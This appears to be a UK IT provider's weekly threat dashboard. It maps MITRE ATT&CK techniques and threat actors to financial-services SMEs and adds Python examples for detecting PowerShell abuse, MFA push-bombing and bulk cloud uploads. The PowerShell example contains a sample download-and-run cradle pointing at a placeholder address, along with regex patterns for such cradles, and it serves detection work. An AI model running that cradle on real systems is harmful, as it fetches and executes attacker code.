MITRE ATT&CK SME Edition

MITRE-Lite Threat Dashboard

The full MITRE ATT&CK framework catalogues hundreds of techniques and sub-techniques used by nation-states and sophisticated criminal groups. This dashboard cuts it down to the techniques that are actually being used against UK SMEs and financial services firms, right now, in plain English.

Last updated: 16 June 2026  ·  Week 25 / 2026

Feed status: NCSC feed current  ·  CISA KEV current  ·  Actor profiles reviewed weekly

Refreshed weekly. Next update: 23 June 2026.

Active Threat Actors Targeting UK Financial Services

7 active threat actor groups  ·  confirmed targeting UK financial services SMEs
14 techniques in active use  ·  from the SME-relevant ATT&CK subset
1 new technique this week  ·  drive-by browser exploit via a crafted HTML page (Chrome, Edge and Opera affected)
4 CISA KEV entries  ·  SME-relevant new entries, including a ransomware-flagged Oracle PeopleSoft vulnerability

What is MITRE ATT&CK? It is a publicly maintained knowledge base of the tactics and techniques that criminal groups and state-sponsored attackers have been observed using in real intrusions: think of it as a documented playbook of what attackers actually do. This dashboard filters it down to the techniques that realistically threaten businesses like yours: small financial services firms, insurance brokers, and professional services companies in the UK.
For each actor: origin, primary method, active techniques (ATT&CK IDs) and SME risk rating.

Scattered Spider (aka UNC3944, Octo Tempest)
  Origin: Cybercrime
  Primary method: SIM-swapping and social engineering to bypass MFA; targets IT helpdesks to gain access.
  Active techniques: T1078, T1566.001, T1621
  SME risk: HIGH

ALPHV / BlackCat (ransomware-as-a-service group)
  Origin: Cybercrime
  Primary method: Ransomware deployment following stolen credentials and VPN exploitation. Known to target professional services firms.
  Active techniques: T1486, T1190, T1657
  SME risk: HIGH

APT29 / Cozy Bear (SVR, Russian Foreign Intelligence Service)
  Origin: Russia, state
  Primary method: Spearphishing and supply chain compromise. Primarily targets government and finance. Sophisticated, long-dwell operations.
  Active techniques: T1566.002, T1195, T1071.001
  SME risk: MEDIUM

APT40 / BRONZE MOHAWK (Chinese MSS-linked group)
  Origin: China, state
  Primary method: Exploitation of internet-facing services and VPNs. Actively targeting financial data and intellectual property.
  Active techniques: T1190, T1133, T1041
  SME risk: MEDIUM

MuddyWater (STATIC KITTEN, Iranian MOIS)
  Origin: Iran, state
  Primary method: Phishing and exploitation of internet-facing web software (Laravel applications, Zimbra). Targeting professional services and finance for espionage.
  Active techniques: T1566.001, T1190, T1059
  SME risk: MEDIUM

LockBit 3.0 Affiliates (ransomware-as-a-service network)
  Origin: Cybercrime
  Primary method: Access brokers sell network entry to affiliates who then deploy LockBit ransomware. SMEs frequently targeted as easier entry points.
  Active techniques: T1486, T1078, T1083
  SME risk: HIGH

TA4903 (BEC specialists)
  Origin: Cybercrime
  Primary method: Impersonation of senior staff, solicitors, and payment processors to redirect bank transfers. Primary threat vector for insurance brokers.
  Active techniques: T1566.002, T1534, T1078
  SME risk: HIGH

How Much of This Does GET-IT Cover?

9 techniques covered  ·  the GET-IT stack addresses these directly
64% coverage rate  ·  9 of the 14 active techniques this week (unchanged from last week)
5 uncovered techniques  ·  an honest gap: not covered by the current stack
Partial exfiltration coverage  ·  monitoring detects data movement but cannot always block it

We show you the gaps honestly. No security provider covers everything. The 5 uncovered techniques include areas where mitigations depend on human behaviour (staff training) or third-party dependencies (your cloud provider, your line-of-business software vendor). We flag them so you know what to ask about, and so you can factor them into cyber insurance conversations.

Coverage by Tactic

Initial Access: 3 of 4 techniques covered (75%)
Execution: 4 of 5 techniques covered (80%)
Persistence: 2 of 3 techniques covered (67%)
Lateral Movement: 1 of 2 techniques covered (50%)
Exfiltration: 1 of 3 techniques covered (33%)
Impact: 3 of 3 techniques covered (100%)

The per-tactic figures do not add up to the 14 distinct techniques and 9 covered above because ATT&CK maps some techniques to more than one tactic (T1078 Valid Accounts, for example, appears under both Initial Access and Persistence) and each is counted under every tactic it belongs to.
Exfiltration gap — what this means for your insurance: If an attacker reaches your data and moves it slowly out via legitimate cloud services (Microsoft OneDrive, SharePoint, or email), detection requires behavioural monitoring that goes beyond standard endpoint protection. Many cyber insurance policies include data exfiltration in their coverage — but only where you can demonstrate attempted prevention. Speak to us if this concerns you.

Techniques in Use Against UK SMEs This Week

T1566.001 · T1566.002
Phishing — Email & Link-based
Attackers send fake emails pretending to be HMRC, your bank, a solicitor, or a trusted supplier. The email contains a malicious attachment or a link to a fake login page designed to steal your password.
T1190
Exploit Public-Facing Application
Attackers search for unpatched software on your internet-facing systems — VPNs, firewalls, web apps — and exploit known security holes to get in. This is the entry point for many ransomware campaigns. This week: Palo Alto PAN-OS VPN bypass (CVE-2026-0257) confirmed actively exploited.
T1078
Valid Accounts (Stolen Credentials)
An attacker who has obtained a username and password (from a previous breach, phishing, or the dark web) simply logs in using legitimate credentials. No hacking required — they look like a real user.
T1059
Command and Scripting Interpreter (PowerShell / cmd)
Once inside, attackers use built-in Windows tools (PowerShell, the command prompt) to run malicious commands without installing suspicious software. This makes them harder to detect because they're using your own tools against you. The tell-tale signs are in how PowerShell is launched: encoded command lines, hidden windows, download-and-run one-liners, and PowerShell started by an Office application rather than by a user.
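The detection side of this technique, as an added worked example that is not the dashboard's own code and does not describe the GET-IT stack. The detection logic is written in Python rather than PowerShell because it runs over exported process-creation events, not on the endpoint. It decodes the base64 payload behind PowerShell's -EncodedCommand switch (UTF-16LE, which is why the blobs look so long), scores each command line against indicators such as download cradles and hidden windows, and adds weight when the PowerShell process was spawned by an Office application. The event schema, hostnames, usernames and the 203.0.113.5 address are constructed assumptions.

```python
"""Triage of PowerShell process-creation events for living-off-the-land use.

Added example: not part of the dashboard or the GET-IT stack. Events use a
simplified schema (host, user, parent, cmdline); real Sysmon event 1, Security
4688 or PowerShell 4104 records carry more fields. Hosts, users and the
203.0.113.5 address are constructed.
"""
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# (regex, label, weight) scored over the command line plus the decoded payload
INDICATORS = [
    (r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|bitsadmin", "download cradle", 3),
    (r"\biex\b|invoke-expression", "Invoke-Expression", 2),
    (r"frombase64string", "nested base64", 2),
    (r"-w(indowstyle)?\s+hidden", "hidden window", 1),
    (r"-nop(rofile)?\b", "no profile", 1),
    (r"-ex(ec|ecutionpolicy)?\s+bypass", "execution policy bypass", 1),
]
# -EncodedCommand and its abbreviations, followed by the base64 blob
ENC_RE = re.compile(r"(?i)(?:-|/)(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event):
    cmdline = event["cmdline"]
    decoded = decode_encoded_command(cmdline)
    # Drop the base64 blob before matching so its random letters cannot hit a pattern.
    text = ENC_RE.sub(" ", cmdline) + " " + (decoded or "")
    score, hits = (2, ["encoded command"]) if decoded is not None else (0, [])
    for pattern, label, weight in INDICATORS:
        if re.search(pattern, text, re.I):
            score += weight
            hits.append(label)
    if event["parent"].lower() in OFFICE_PARENTS:    # macro / document-launched PowerShell
        score += 3
        hits.append("spawned by Office application")
    return {"host": event["host"], "user": event["user"], "score": score,
            "indicators": hits, "decoded": decoded, "cmdline": cmdline}


def triage(events, threshold=4):
    """Events scoring at or above threshold, for an analyst to look at."""
    return [s for s in map(score_event, events) if s["score"] >= threshold]


def encode_command(ps):
    """How -EncodedCommand values are produced (by admins and attackers alike)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed sample events: one interactive admin command, one benign
# scheduled task using -enc, one macro-launched download cradle.
SAMPLE_EVENTS = [
    {"host": "WS-FIN-03", "user": "a.khan", "parent": "explorer.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Service"},
    {"host": "WS-FIN-07", "user": "s.patel", "parent": "svchost.exe",
     "cmdline": "powershell.exe -enc " + encode_command("Get-Date | Out-File C:\\ops\\heartbeat.txt")},
    {"host": "WS-FIN-12", "user": "m.okafor", "parent": "WINWORD.EXE",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_command(
         "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')")},
]


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["host"], hit["score"], hit["indicators"])
        print("  decoded:", hit["decoded"])
```

Only the Word-launched event crosses the threshold; the scheduled task that also uses -enc scores just 2, which is the point of scoring rather than alerting on every encoded command. Enabling PowerShell script block logging (event 4104) gives you the decoded script directly and removes the guesswork for obfuscation that this simple decoder does not handle.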
T1621
MFA Fatigue Attack (MFA Request Generation)
An attacker who has your password sends dozens of multi-factor authentication (MFA) push notifications to your phone, hoping you'll accidentally approve one, or approve it just to make the alerts stop. Nothing is cracked or stolen: the attacker simply gets you to satisfy the second factor on their behalf. Push prompts with number matching, or phishing-resistant methods such as FIDO2 security keys and passkeys, remove the attack because there is nothing to approve by mistake.
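The pattern is visible in sign-in logs, which is what makes it detectable before number matching is rolled out. Added worked example in Python, not the dashboard's own code and not the GET-IT stack: it walks constructed sign-in records, counts push prompts that were denied or timed out inside a ten-minute window, raises a medium alert when a burst reaches the threshold and a high alert when an approval follows that burst. The record fields (ts, user, ip, mfa) are a simplified assumption, not the real Entra ID or Okta export format.

```python
"""MFA fatigue (push-bombing) detection over sign-in events.

Added example: not part of the dashboard or the GET-IT stack. The
records are constructed and use a simplified schema (ts, user, ip, mfa)
that is an assumption, not the real Entra ID / Okta sign-in export.
"""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)   # how far back unapproved prompts still count
BURST_THRESHOLD = 5              # unapproved prompts inside WINDOW = a burst

# Constructed sample: a.khan receives six prompts in under four minutes and
# approves the last one; j.smith has a normal day with one accidental deny.
# Addresses are from documentation ranges.
SAMPLE_SIGNINS = [
    {"ts": "2026-06-15T08:01:10", "user": "a.khan", "ip": "198.51.100.23", "mfa": "denied"},
    {"ts": "2026-06-15T08:01:40", "user": "a.khan", "ip": "198.51.100.23", "mfa": "timeout"},
    {"ts": "2026-06-15T08:02:15", "user": "a.khan", "ip": "198.51.100.23", "mfa": "denied"},
    {"ts": "2026-06-15T08:02:50", "user": "a.khan", "ip": "198.51.100.23", "mfa": "timeout"},
    {"ts": "2026-06-15T08:03:30", "user": "a.khan", "ip": "198.51.100.23", "mfa": "denied"},
    {"ts": "2026-06-15T08:04:05", "user": "a.khan", "ip": "198.51.100.23", "mfa": "timeout"},
    {"ts": "2026-06-15T08:04:40", "user": "a.khan", "ip": "198.51.100.23", "mfa": "approved"},
    {"ts": "2026-06-15T09:00:02", "user": "j.smith", "ip": "203.0.113.8", "mfa": "approved"},
    {"ts": "2026-06-15T13:00:10", "user": "j.smith", "ip": "203.0.113.8", "mfa": "denied"},
    {"ts": "2026-06-15T13:00:45", "user": "j.smith", "ip": "203.0.113.8", "mfa": "approved"},
]


def _events_by_user(records):
    """Group records by user and sort each user's events by time."""
    by_user = defaultdict(list)
    for r in records:
        by_user[r["user"]].append((datetime.fromisoformat(r["ts"]), r["ip"], r["mfa"]))
    for events in by_user.values():
        events.sort(key=lambda e: e[0])
    return by_user


def detect_mfa_fatigue(records, threshold=BURST_THRESHOLD, window=WINDOW):
    """Return alerts: 'medium' when a burst of unapproved prompts reaches the
    threshold, 'high' when the user then approves a prompt inside the window
    (the attacker is now signed in with the victim's own MFA)."""
    alerts = []
    for user, events in _events_by_user(records).items():
        pending = []            # (ts, ip) of unapproved prompts still in window
        burst_reported = False
        for ts, ip, result in events:
            pending = [(t, i) for t, i in pending if ts - t <= window]
            if result in ("denied", "timeout"):
                pending.append((ts, ip))
                if len(pending) >= threshold and not burst_reported:
                    alerts.append({"user": user, "severity": "medium",
                                   "reason": "push burst without approval",
                                   "prompts": len(pending), "source_ip": ip,
                                   "at": ts.isoformat()})
                    burst_reported = True
            elif result == "approved":
                if len(pending) >= threshold:
                    alerts.append({"user": user, "severity": "high",
                                   "reason": "approval after push burst",
                                   "prompts": len(pending), "source_ip": ip,
                                   "at": ts.isoformat()})
                pending = []        # an approval closes the episode either way
                burst_reported = False
    return alerts


if __name__ == "__main__":
    for alert in detect_mfa_fatigue(SAMPLE_SIGNINS):
        print(alert)
```

The medium alert is the one to act on: it fires while the bombing is still in progress and a phone call to the user (plus a password reset, since the attacker already has it) ends the episode. The high alert means the attacker is in and the session should be revoked.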
T1598.001
Messaging App Targeting (Phishing for Information: Spearphishing Service)
Attackers harvest WhatsApp, Signal, and LinkedIn accounts of senior staff to build social engineering profiles, then impersonate trusted contacts to extract credentials or authorise fraudulent payments. NCSC issued a specific warning this week.
T1133
External Remote Services (VPN Abuse)
Attackers exploit or abuse your VPN, remote desktop (RDP), or remote access tools to maintain persistent access — often long after the initial breach is discovered. They effectively install a back door.
T1534
Internal Spearphishing
Having compromised one email account, attackers use it to send convincing phishing emails to other staff internally. A message appearing to come from your MD or finance director asking to approve an urgent payment.
T1041 · T1567
Data Exfiltration via Cloud Services
Attackers copy your files out through legitimate cloud services (SharePoint, OneDrive, Dropbox, Google Drive) because this traffic looks normal to most security tools; T1567 covers uploads to services like these, while T1041 covers data sent back over the attacker's own command-and-control channel. Either way the data is gone before anyone notices unless someone is watching how much each user sends out, and to where.
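The behavioural monitoring referred to here, and in the exfiltration gap note above, is at its simplest a baseline of how much each user normally uploads to cloud storage. Added worked example in Python, not the dashboard's own code and not the GET-IT stack, over constructed proxy log lines: it totals upload bytes per user per day to a list of cloud storage domains, flags a day that is far above that user's own median (the bulk upload), and separately flags a rolling seven-day total above a hard cap, which is the check that catches a patient, low-and-slow transfer the spike rule never sees. The log format, domain list and thresholds are assumptions.

```python
"""Behavioural detection of bulk and sustained uploads to cloud storage.

Added example: not part of the dashboard or the GET-IT stack. The proxy log
format (timestamp user host method bytes_out), the domain list and the
thresholds are assumptions; real proxy / CASB exports differ. All log lines
are constructed by constructed_log_lines().
"""
import re
from collections import defaultdict
from datetime import date, timedelta
from statistics import median

MiB = 1024 * 1024
CLOUD_STORAGE_DOMAINS = {"onedrive.live.com", "sharepoint.com", "dropbox.com",
                         "dropboxapi.com", "drive.google.com", "mega.nz"}
UPLOAD_METHODS = {"PUT", "POST"}
LOG_RE = re.compile(r"^(?P<day>\d{4}-\d{2}-\d{2})T\S+ (?P<user>\S+) (?P<host>\S+) "
                    r"(?P<method>[A-Z]+) (?P<bytes_out>\d+)$")


def constructed_log_lines():
    """a.khan: ~21 MiB/day to OneDrive for five days, then 350 MiB to Dropbox
    at 02:00 on the sixth. b.lee: a steady 160 MiB/day for seven days (low and
    slow, never a spike against their own baseline)."""
    lines, day0 = [], date(2026, 6, 8)
    for d in range(5):
        day = (day0 + timedelta(days=d)).isoformat()
        lines += [f"{day}T10:{n:02d}:00 a.khan onedrive.live.com PUT {7 * MiB}" for n in range(3)]
    spike_day = (day0 + timedelta(days=5)).isoformat()
    lines += [f"{spike_day}T02:{n:02d}:00 a.khan dl.dropbox.com PUT {10 * MiB}" for n in range(35)]
    for d in range(7):
        day = (day0 + timedelta(days=d)).isoformat()
        lines += [f"{day}T11:{n:02d}:00 b.lee content.dropboxapi.com POST {10 * MiB}" for n in range(16)]
    lines.append(f"{spike_day}T12:00:00 a.khan www.example.com GET 512")  # not an upload: ignored
    return lines


def is_cloud_storage(host):
    return any(host == d or host.endswith("." + d) for d in CLOUD_STORAGE_DOMAINS)


def daily_upload_totals(lines):
    """user -> {date: bytes uploaded to cloud storage on that day}"""
    totals = defaultdict(lambda: defaultdict(int))
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] not in UPLOAD_METHODS or not is_cloud_storage(m["host"]):
            continue
        totals[m["user"]][date.fromisoformat(m["day"])] += int(m["bytes_out"])
    return totals


def detect_cloud_exfiltration(lines, spike_ratio=8.0, spike_min=100 * MiB,
                              sustained_cap=1024 * MiB, sustained_days=7, min_history=3):
    alerts = []
    for user, per_day in daily_upload_totals(lines).items():
        days = sorted(per_day)
        for i, day in enumerate(days):
            today = per_day[day]
            history = [per_day[d] for d in days[:i]]
            # Rule 1: today is far above this user's own median (bulk upload).
            if len(history) >= min_history:
                baseline = median(history)
                if today >= spike_min and today >= spike_ratio * max(baseline, 1):
                    alerts.append({"user": user, "kind": "spike", "day": day.isoformat(),
                                   "bytes": today, "baseline": baseline})
            # Rule 2: rolling total over the last N days above a hard cap. This is
            # what catches a patient transfer that looks 'normal' for the user each day.
            start = day - timedelta(days=sustained_days - 1)
            rolling = sum(b for d, b in per_day.items() if start <= d <= day)
            if rolling >= sustained_cap:
                alerts.append({"user": user, "kind": "sustained", "day": day.isoformat(),
                               "bytes": rolling, "baseline": None})
    return alerts


if __name__ == "__main__":
    for alert in detect_cloud_exfiltration(constructed_log_lines()):
        print(alert)
```

Two things a real deployment adds: the destination account (an upload to the company's own SharePoint tenant is very different from one to a personal Dropbox, which a CASB can distinguish and a plain proxy cannot), and the time of day, since the 02:00 burst in the sample is suspicious on its own. Both rules here only detect; blocking the transfer needs a proxy or CASB policy, which is the "partial" in the coverage figure above.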
T1486
Data Encryption for Ransom
The final step in most ransomware attacks — all your files are encrypted and you're locked out of your own systems. A ransom demand follows. UK SMEs paid an average of £47,000 per incident in 2025, with recovery taking 3–4 weeks.
T1657
Financial Theft (Business Email Compromise)
An attacker with access to a business email account monitors payment conversations and intercepts at the right moment — substituting their own bank account details. The #1 financial loss vector for UK insurance brokers and professional services firms.

Current Risk Status for UK Financial Services SMEs

THREAT LEVEL: ELEVATED

Sustained High-Activity Period — Financial Services Sector

NCSC and industry sources indicate continued elevated threat activity targeting UK professional services and financial sector SMEs. BEC attacks on insurance brokers are up approximately 34% year-on-year. Ransomware affiliate groups continue to prioritise SME targets identified as having weaker controls than enterprise counterparts. No specific imminent threat to a named organisation — but the baseline risk for this sector remains above normal.

► Highest Severity Active Technique — Week 25 / 2026

Drive-by Compromise (T1189): Google Chromium V8 Out-of-Bounds Vulnerability

CISA added CVE-2026-11645 to its Known Exploited Vulnerabilities catalog on 9 June 2026: an out-of-bounds read and write vulnerability in Google Chromium's V8 JavaScript engine that lets a remote attacker execute arbitrary code inside the renderer sandbox via a crafted HTML page. Because V8 is part of Chromium, the bug is present in every browser built on it, including Google Chrome, Microsoft Edge and Opera. A user only has to load a malicious or compromised page; no click and no download is needed.

One caveat on severity: as described, the bug gives code execution inside the browser's sandbox, which on its own does not hand the attacker the whole machine. V8 bugs of this kind are routinely chained with a separate sandbox-escape flaw, however, so the practical advice is unchanged: treat it as drive-by remote code execution and patch this week. Confirm patch status with your IT provider, and check the version actually running (chrome://version, edge://version) rather than whether an update has downloaded: Chrome and Edge only apply an update when the browser is restarted, so a browser left open for days is still running the old build.

Also added: Oracle PeopleSoft Enterprise PeopleTools (CVE-2026-35273), carrying a confirmed ransomware exploitation flag; unauthenticated attackers can achieve full system takeover. Organisations running PeopleSoft for HR or ERP should treat this as critical.

GCHQ Director Anne Keast-Butler confirmed this week at London Tech Week that the most prominent threats in cyberspace remain ransomware and criminal activity, with the NCSC handling approximately four nationally significant cyber incidents every week, a figure that underscores the sustained operational tempo attackers are maintaining against UK targets. A Buckinghamshire secondary school (Great Marlow) was forced to close mid-week following a ransomware-style malware incident, further illustrating the operational impact of attacks on organisations with limited IT resource, a profile shared by many SMEs.

Ransomware Activity Indicator

ACTIVE — LockBit 3.0 Affiliates and ALPHV/BlackCat Successors Operational

Both ransomware-as-a-service ecosystems remain active with affiliate networks continuing to acquire access from initial access brokers. UK professional services firms make up approximately 18% of confirmed UK ransomware victims in Q1 2026 (NCSC data). Offline backups, patching cadence, and tested recovery plans are the three most effective mitigations at this level.

Live Source Summary

NCSC UK Alerts: 0 new this week
No new NCSC advisories this week. The GCHQ Director's London Tech Week remarks (around four nationally significant incidents handled per week; ransomware and criminal activity the most prominent threats) are covered under the threat status above.
Latest advisory: 4 June 2026

CISA KEV Entries (SME-relevant): 4 new
Google Chromium V8 drive-by browser exploit (Chrome, Edge, Opera); Oracle PeopleSoft PeopleTools with a confirmed ransomware flag; Ivanti Sentry OS command injection; Cisco Catalyst SD-WAN command execution.
Latest entry: 12 June 2026

Top Sector Affected This Week: Finance & Insurance
FCA warns consumers about misleading car finance claims management adverts and secures a confiscation order against a Ponzi scheme fraudster. AI-fabricated evidence has been confirmed in a UK criminal case (a Derbyshire police officer is under criminal investigation), raising direct concerns about fraudulent documentation in insurance claims.
FCA alert: 9 June 2026
Full Advisory Detail
For full advisory detail, vulnerability write-ups, and CISA KEV entries see the Threat Advisory page.

Does Your Security Stack Cover These Techniques?

64% coverage of active techniques is a starting point. If you'd like to understand exactly where your gaps are — and what it would cost to close them — book a resilience scan.


Intelligence sourced from NCSC UK, the CISA Known Exploited Vulnerabilities Catalog, FCA ScamSmart, and the MITRE ATT&CK framework (licensed under CC BY 4.0). Technique descriptions are plain-English interpretations for SME audiences and are not verbatim reproductions of MITRE documentation. Coverage assessments reflect the GET-IT stack as configured for a typical SME client — actual coverage depends on your specific environment. This dashboard is updated weekly; data may not reflect events in the 24–48 hours prior to the last refresh date. GET-IT Solutions Ltd is not responsible for inaccuracies in third-party source data.